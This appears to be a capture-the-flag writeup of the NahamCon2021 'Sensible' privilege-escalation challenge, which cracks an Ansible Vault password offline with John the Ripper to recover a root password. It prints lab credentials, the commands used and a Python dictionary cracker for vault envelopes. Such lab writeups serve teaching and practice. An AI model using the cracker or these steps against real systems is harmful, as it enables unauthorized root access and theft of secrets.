NahamCon2021 CTF - Sensible - Writeup
Introduction
Today we're doing a CTF writeup for the Sensible challenge from the NahamCon2021 CTF. Sensible is a Linux privilege escalation challenge; after starting it, we receive a connection string we can use to reach the target:
First, we authenticate into the system using leo's credentials which we captured in a previous challenge:
ssh -p 30010 leo@challenge.nahamcon.com
input password: constelleorising
After some enumeration, we find that there is an interesting file in the /opt/playbooks directory:
cd /opt/playbooks
ls
This file, and the presence of the /opt/playbooks directory, suggest that the system is managed with the Ansible configuration management tool. We confirm that Ansible is installed:
which ansible
Ansible is indeed installed on this system. Let's take a look at the getinfo.yaml file:
cat getinfo.yaml
We see an Ansible Vault-encrypted string here (the block beginning with $ANSIBLE_VAULT;1.1;AES256). Strictly speaking it is not a hash, but the vault envelope stores the PBKDF2 salt and an HMAC-SHA256 tag next to the ciphertext, so anyone who can read the playbook can test vault password guesses offline. We can crack it after converting it into a format that John the Ripper understands. First we copy this portion of the file into a file on our attacking system:
From attacking system:
gedit sensibleHash.txt
Note that we're eliminating the spaces at the start of each line. Next we run the ansible2john.py script on sensibleHash.txt and output sensHash4John.txt:
python /usr/share/john/ansible2john.py sensibleHash.txt > sensHash4John.txt
Since we use Windows for John the Ripper, we'll take the output of sensHash4John.txt and create the same file in our Windows system, then pass the sensHash4John.txt file to John the Ripper with rockyou.txt as a wordlist:
john sensHash4John.txt -wordlist=rockyou.txt
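To make explicit what ansible2john.py and John are doing in the steps above, here is an added example (my own stdlib-only Python, not the challenge author's code and not Ansible's or John's own implementation). It parses a vault envelope, rebuilds the `$ansible$` line in the field order ansible2john.py emits, and verifies password guesses the way John does: derive 80 bytes with PBKDF2-HMAC-SHA256 (10,000 rounds) from the salt, take bytes 32..63 as the HMAC key, and compare HMAC-SHA256 over the ciphertext with the stored tag. The sample envelope, its salt, its ciphertext bytes and the wordlist are all constructed for this example; the ciphertext is dummy data, so the block does not decrypt anything, and that step stays with ansible-vault decrypt as shown in the writeup.

```python
import binascii
import hashlib
import hmac

# Ansible Vault 1.1/1.2 AES256 parameters (as used by Ansible's VaultAES256 class).
ITERATIONS = 10000   # PBKDF2-HMAC-SHA256 rounds
KEY_LEN = 32         # AES-256 key length, also the HMAC-SHA256 key length
IV_LEN = 16          # CTR nonce/IV length
HEADER = "$ANSIBLE_VAULT"


def parse_vault(text):
    """Split an $ANSIBLE_VAULT;1.x;AES256 envelope into (salt, hmac_tag, ciphertext).

    Leading whitespace on each line (YAML indentation) is ignored, so the block
    can be pasted straight out of a playbook without hand-editing.
    """
    lines = [line.strip() for line in text.strip().splitlines() if line.strip()]
    fields = lines[0].split(";")
    if fields[0] != HEADER or len(fields) < 3 or fields[2] != "AES256":
        raise ValueError("not an AES256 Ansible Vault envelope")
    inner = binascii.unhexlify("".join(lines[1:]))   # strip the outer hex layer
    salt_hex, tag_hex, ct_hex = inner.split(b"\n")    # three newline-separated hex fields
    return (binascii.unhexlify(salt_hex),
            binascii.unhexlify(tag_hex),
            binascii.unhexlify(ct_hex))


def derive_keys(password, salt):
    """PBKDF2-HMAC-SHA256 -> 80 bytes, split into AES key, HMAC key and IV."""
    derived = hashlib.pbkdf2_hmac("sha256", password.encode(), salt,
                                  ITERATIONS, 2 * KEY_LEN + IV_LEN)
    return derived[:KEY_LEN], derived[KEY_LEN:2 * KEY_LEN], derived[2 * KEY_LEN:]


def check_password(password, salt, tag, ciphertext):
    """True if HMAC-SHA256(hmac_key, ciphertext) equals the stored tag; no AES needed."""
    _, hmac_key, _ = derive_keys(password, salt)
    computed = hmac.new(hmac_key, ciphertext, hashlib.sha256).digest()
    return hmac.compare_digest(computed, tag)


def to_john(vault_text, label="vault"):
    """Render the fields as the $ansible$ line ansible2john.py writes for john."""
    salt, tag, ct = parse_vault(vault_text)
    return "%s:$ansible$0*0*%s*%s*%s" % (label, salt.hex(), ct.hex(), tag.hex())


def crack(vault_text, wordlist):
    """Dictionary attack: return the first candidate whose HMAC verifies, else None."""
    salt, tag, ct = parse_vault(vault_text)
    for candidate in wordlist:
        if check_password(candidate, salt, tag, ct):
            return candidate
    return None


def build_vault_text(password, salt, ciphertext):
    """Build an envelope around a *constructed* ciphertext (HMAC only, no AES here).

    The lines are indented six spaces to mimic the YAML layout in a playbook.
    """
    _, hmac_key, _ = derive_keys(password, salt)
    tag_hex = hmac.new(hmac_key, ciphertext, hashlib.sha256).hexdigest().encode()
    inner = b"\n".join([binascii.hexlify(salt), tag_hex, binascii.hexlify(ciphertext)])
    outer = binascii.hexlify(inner).decode()
    body = "\n".join("      " + outer[i:i + 80] for i in range(0, len(outer), 80))
    return "      %s;1.1;AES256\n%s\n" % (HEADER, body)


# Constructed sample: fixed salt, dummy ciphertext, vault password "starlight".
SAMPLE_SALT = bytes(range(32))
SAMPLE_CIPHERTEXT = bytes.fromhex("00112233445566778899aabbccddeeff" * 2)
SAMPLE_VAULT = build_vault_text("starlight", SAMPLE_SALT, SAMPLE_CIPHERTEXT)
WORDLIST = ["123456", "password", "constellation", "starlight", "letmein"]

if __name__ == "__main__":
    print(to_john(SAMPLE_VAULT))
    print("cracked:", crack(SAMPLE_VAULT, WORDLIST))
```

The point to take away is that the HMAC check is the whole "hash": every guess costs one PBKDF2 run plus one HMAC, and the ciphertext never has to be decrypted to know whether a guess is right. A vault password drawn from rockyou.txt therefore offers no real protection once the playbook is readable.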
So we've cracked the Ansible Vault password for the Sensible system (starlight). This Stack Overflow answer shows how to decrypt a vault string directly from the command line:
https://stackoverflow.com/questions/43467180/how-to-decrypt-string-with-ansible-vault-2-3-0/45107666#45107666
Following that answer, we pipe the vault string into ansible-vault decrypt, which reads the ciphertext from stdin and writes the plaintext to stdout (the trailing echo just adds a newline after the output):
echo '$ANSIBLE_VAULT;1.1;AES256
32313438363938386263306136303839653830363838326466313566393330616130303861643363
3463623464306163343466393338336365656436386333320a306664343239666634316636633630
63633031396233366539616265633161346637626435363732333637663336363338346536643834
6666653830363637390a636566663836363062326535356164396162373331313662326663613532
32303062323465313035313361393962333163306462313865313165393034363832' | ansible-vault decrypt && echo
input password: starlight
The decrypted value is the root password. Let's switch to that account:
su
input: il0vec0nst311at10ns
Finally, we access the flag file:
cat /root/flag.txt
Summary
Upon enumeration of the system, we discovered that Ansible was installed and located a readable playbook containing an Ansible Vault-encrypted secret. Because the vault envelope carries its PBKDF2 salt and HMAC alongside the ciphertext, the vault password could be attacked offline, and a wordlist run with John the Ripper recovered it. Decrypting the vault with that password revealed the root password; we then switched users to the root account and captured the flag file.
Finish